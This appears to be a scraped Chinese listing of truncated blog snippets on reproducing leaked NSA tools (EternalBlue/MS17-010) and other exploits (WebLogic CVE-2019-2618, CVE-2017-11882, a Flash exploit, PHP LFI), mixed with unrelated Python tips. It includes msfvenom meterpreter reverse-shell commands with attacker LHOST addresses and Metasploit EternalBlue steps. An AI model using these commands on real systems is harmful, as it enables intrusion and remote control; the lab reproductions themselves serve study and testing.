方程式ETERNALBLUE 之fb.py的复现】的更多相关文章

原文链接:https://www.t00ls.net/viewthread.php?tid=39343…
使用方法: 环境搭建:win2003下测试: 下载python2.6并安装 下载pywin32并安装 将C:\Python26添加到环境变量PATH中 将整个windows目录复制到windows2003上 对fb.py进行编辑: 将EQGRP_Lost_in_Translation下载到的文件解压,找到\windows\fb.py,将,下图中两个部分注释掉: 然后运行python fb.py就可以执行:…
EternalBlue漏洞复现 1.    实训目的 永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010.该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马.由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多…
use v6; if (@*ARGS != 1) {say 'Use:scan.p6 ip';exit;} my $check_ip = @*ARGS[0]; $check_ip = '<value>'~$check_ip~'</value>'; say $check_ip; my $stat_file = 'Smbtouch-1.1.1.xml'; my $chang_file = slurp $stat_file; my $swap_data = do given $chang…
0x01 漏洞原理:http://blogs.360.cn/blog/nsa-eternalblue-smb/ 目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000.Windows XP.Windows 2003.Windows Vista.Windows 7.Windows 8,Windows 2008.Windows 2008 R2.Windows Server 2012 SP0. 背景: 2016 年 8 月有一个 “Shadow Broker…
20145330 <网络对抗> Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 加分项目: PC平台逆向破解:注入shellcode 和 Return-to-libc攻击实验 http://www.cnblogs.com/20145330swx/p/6514359.html 摘要 本次免考项目分为两个模块:Eternalblue(MS17-010)漏洞利用工具实现Win 7系统入侵与S2-045漏洞的利用及修复 Eternalblue…
        好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷的用,也可以,可是,你不能泄露出来啊,我们要感谢伟大的组织Shadow Brokers(影子经纪人)多酷炫的名字,有木有很文艺的感觉,感谢他让我们小屁民也用用NSA的工具,O(∩_∩)O哈哈哈~,2016 年 8 月Shadow Brokers入侵了方程式组织(Equation Group是NSA下…
本帖由春秋首发~作者:神风 @春秋文阁负责人 方程式又一波0day[该贴有工具]:https://bbs.ichunqiu.com/thread-21736-1-1.html 最近一段时间出现一波高潮  小伙伴都在跃跃欲试现在就做一次详细的过程吧~~~有说的不好的地方望指出!!~~~ 本次利用是在本地测试   只能有个大概的思路~~~ 正文.首先利用就必须有一个运行环境已测试用win732位环境利用成功这里需要下载python2.6,和pywin32.在打开fb.py 把以下几个地方注释掉<ig…
一大早起床是不是觉得阳光明媚岁月静好?然而网络空间刚刚诞生了一波核弹级爆炸!Shadow Brokers再次泄露出一份震惊世界的机密文档,其中包含了多个精美的 Windows 远程漏洞利用工具,可以覆盖全球 70% 的 Windows 服务器,一夜之间所有Windows服务器几乎全线暴露在危险之中,任何人都可以直接下载并远程攻击利用,考虑到国内不少高校.政府.国企甚至还有一些互联网公司还在使用 Windows 服务器,这次事件影响力堪称网络大地震. 目前已知受影响的 Windows 版本包括但不…
附加知识: 漏洞来源与背景: 这个漏洞最初是由NSA(美国国家安全局)发现的,但是他们发现漏洞他不讲,然后遭殃了吧. 后来 有一个黑客组织叫:Shadow Brokers (影子经纪人) 入侵了NSA下属的黑客组织,窃取了大量的工具.  并且将部分的黑客工具公开到互联网上拍卖,当时预期公开的价格是100W比特币(价值近5亿美元),但一直都没人买.  要知道黑客都是有脾气的,  一气之下 ,把工具公开免费的放出来.  然后EternalBlue就这样被公开出来了.   Shadow Brokers…
自Shadow Brokers公布NSA泄露工具后,各路大神陆陆续续发表复现过程,这几天也仔细试了各种套路,一直想弄明白DoublePulsar中的shellcode到底是如何用的,刚好又在模拟环境中偶遇Windows Server 2003,EternalRomance貌似只能用shellcode方式植入利用,于是各种试错以后有了这篇文章. 有何不妥处请各路大神指教! 前期准备 友情提示 Dander Spiritz使用中的一个坑. 如果想用Dander Spiritz生成回连dll,并控制会…
CVE-2019-2618任意文件上传漏洞复现 漏洞介绍: 近期在内网扫描出不少CVE-2019-2618漏洞,需要复测,自己先搭个环境测试,复现下利用过程,该漏洞主要是利用了WebLogic组件中的DeploymentService接口向服务器上传文件.攻击者突破了OAM(Oracle Access Management)认证,设置wl_request_type参数为app_upload,构造文件上传格式的POST请求包,上传jsp木马文件,进而可以获得整个服务器的权限. 环境准备 靶机:已经…
0x01 前言 4月14日,影子经纪人在steemit.com上公开了一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具.一夜之间,全世界70%的windows服务器置于危险之中,国内使用windows服务器的高校.国企甚至政府机构也不能幸免. 据了解,受影响的Windows 版本包括Windows NT,Windows 2000.Windows XP.Windows 2003…
Shadow Brokers泄露出一份震惊世界的机密文档,其中包含了多个 Windows 远程漏洞利用工具.本文主要介绍了其中一款工具Fuzzbunch的分析与利用案例 1 整体目录介绍 解压EQGRP_Lost_in_Translation-master.zip文件(下载地址:https://github.com/x0rz/EQGRP_Lost_in_Translation).总共包含三个目录: 1. windows目录针对Windows操作系统的利用工具和相关攻击代码: 2. swift目录…
本文首发Freebuf,属原创奖励计划,未经许可禁止转载. 链接:http://www.freebuf.com/articles/system/132274.html 一. 前言 前段时间Shadow Broker披露了 Windows大量漏洞,甚至爆出黑客组织 Equation Group 对于Windows 远程漏洞 MS17-010 的利用工具,该漏洞影响范围之广,堪称杀器.可以看看官方通告https://technet.microsoft.com/zh-cn/library/securi…
Setup "EQGRP_Lost_in_Translation" Of NAS 1.前言: 北京时间4月14号晚,TheShadowBrokers在steemit.com博客上放出第二波方程式组织Equation Group(为NSA提供服务专门对国外进行间谍活动的组织)的黑客工具包.有网友在github上传了相关的解密后的文件,通过简单的分析所有的解密后的文件,发现其中包括新的23个黑客工具.具体请考:https://github.com/misterch0c/shadowbrok…
影子经纪人(Shadow Brokers)最近陆续曝光的NSA网络武器令人震惊,尽管这些工具是否出自国家级别黑客团队之手尚不清楚,但至少存在一个可以说明问题的事实:这些漏洞利用工具都能有效运行,且具有一定程度的威胁杀伤力.在此,我用NSA的两个大杀器演示对Win 7和Windows  Server 2008系统进行漏洞利用和入侵控制的过程复现. 复现工具说明 在需要用到两个比较有意思的工具,一个为针对微软上个月才刚刚修复的MS17-010漏洞后门利用程序–EternalBlue(从目前使用情况来…
这个漏洞是前段时间爆出来的,几乎影响了全球70%的电脑,不少高校.政府和企业都还在用Windows服务器,这次时间的影响力堪称网络大地震. ----------------------------------------------------------------------------------------------------------------------- 一.实验环境 本机IP:172.16.11.2  Windows 2003 本机IP:172.16.12.2  Kali…
ms17-010 漏洞利用并拿下服务器教程 攻击环境: 攻击机win2003 ip:192.168.150.129 Window2003 Python环境及工具 攻击机kali: ip:192.168.150.128 目标主机window7 x64(未装smb 漏洞补丁) ip:192.168.150.131 演示操作 第一步:在攻击机Window2003 上进行如下操作 安装以下python工具(32位或64位)并配置系统环境变量 解压到C盘 注意,所有环境安装配置好之后,我们在FUZZBUN…
利用视屏:https://v.qq.com/iframe/player.html?vid=g0393qtgvj0&tiny=0&auto=0 使用方法 环境搭建 注意,必须安装32位python2.6相关版本,其他版本不奏效. 下载python2.6并安装 下载pywin32并安装 将C:\Python26添加到环境变量PATH中. 配置环境 将EQGRP_Lost_in_Translation下载到的文件解压,找到\windows\fb.py,将,下图中两个部分注释掉. 然后运行pyth…
Python 高效编程小技巧 个人博客:临风|刀背藏身 Python 一直被我拿来写算法题,小程序,因为他使用起来太方便了,各种niubi闪闪的技能点也在写算法的过程中逐渐被挖掘到,感谢万能的谷哥度娘SOF以及各大博客网站,在这里整理一二. 几句废话: 因为我是懒癌晚期,最不喜欢在文章里发图片,因为Mweb写作或者是马克飞象写作,可以直接拖图进来,但是上传博客的话,就需要考虑是使用服务器上的媒体库,还是放七牛,放七牛上还得用它的命令行工具,或者是Web端操作,想想都好麻烦.所以,本地一直存放着几…
生成器有主要有四种方法: next() 执行函数,直到遇到下一个yield为止,并返回值 send(value) 为生成器发送一个数值,next()方法就相当于send(None) close() 终止生成器 throw(exc[exc_value,[exc_tb]]) 在生成器yield处引发一个异常,close()相当于引发一个GeneratorExit异常 输出型 一个斐波那契数列的例子 def fibonacci(): a, b = 0, 1 while True: yield b a,…
前几天就想写的,因为一些缘故就没写.此次是在外网环境下进行的.大家在内网中也一个样. 方法: 使用Eternalblue模块,剑测是否有漏洞然后msf生成一个dll直接反弹shell. PS:win版本的不知道缘何生成出来的dll是0kb 我就在自己本地的虚拟机生成了一个dll.生成dll命令 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=6566 -f dll > /opt/xishaoni…
目标主机:192.168.220.148,系统为Microsoft Windows Server 2008 R2 Datacenter,开启了445端口 开启msf root@sch01ar:~# msfconsole 搜索一下模块 msf > search Eternalblue 选择第二个 msf > use exploit/windows/smb/ms17_010_eternalblue 查看一下配置信息 msf exploit(ms17_010_eternalblue) > sh…
没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP 近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit.com博客上提供了相关消息.以下是其中Esteemaudit漏洞复现过程. 前期准备 IP 系统信息 用途 备注 192.168.146.132 Windows xp 攻击机 需安python2.6.6&pywin32 192.168.146.129 kali 2.0 用于生成攻击payload(反…
昨晚看到的有复现的文章,一直到今天才去自己复现了一遍,还是例行记录一下. POC: https://github.com/Ridter/CVE-2017-11882/ 一.简单的生成弹计算器的doc文件. 网上看到的改进过的POC,我们直接拿来用,命令如下: #python Command_CVE--.py -c "cmd.exe /c calc.exe" -o test.doc 生成的doc文件直接打开就可以弹出计算器. 影响的脚本: Office Microsoft Office…
影响版本: Adobe Flash Player <= 28.0.0.137 EXP下载地址: 链接: https://pan.baidu.com/s/1_VVQfdx6gsJvEDJj51JgMQ 密码: d8tm 漏洞复现: 攻击机:kail 靶机:win7 x64 浏览器:360浏览器 0x01 生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.94 LPORT=2333 -f python>/…
本来用的是苹果ios得手机,但是步骤较为复杂,没有吃透,最后妥协用了android的机器搞得. 首先找到大牛的github https://github.com/wangshub/wechat_jump_game/ 实验环境: win10+ADB+python3+Huawei荣誉V8 https://adb.clockworkmod.com/   adb下载 复现步骤: 安装依赖 pip install -r requirements.txt 安卓手机打开 USB 调试,设置>开发者选项>US…
题意:就是从n到1再从1到n的各个数字之和为sum1, 然后从n到m,再从m到n的各个数字之和为sum2,求,(n,m)的前10组解. 思路: 直接建模,利用等差数列的求和公式计算一个公式(2n+1)^2 - m^2=1;   然后直接佩尔方程式即可! #include<cstdio> #include<cmath> #define ll long long int main() { int x, y, x1, y1, px, py; x1 = ; y1 = ; px = ; py…
 利用docker复现该漏洞,访问http://192.168.80.156:8080/phpinfo.php,可以看到页面出现phpinfo页面 再访问http://192.168.80.156:8080/lfi.php?file=/etc/passwd,可以看到该页面是存在文件包含漏洞的. 先讲一下利用phpinfo上传文件,然后在文件包含的原理: 参考链接:https://github.com/vulhub/vulhub/tree/master/php/inclusion 在给PHP发送P…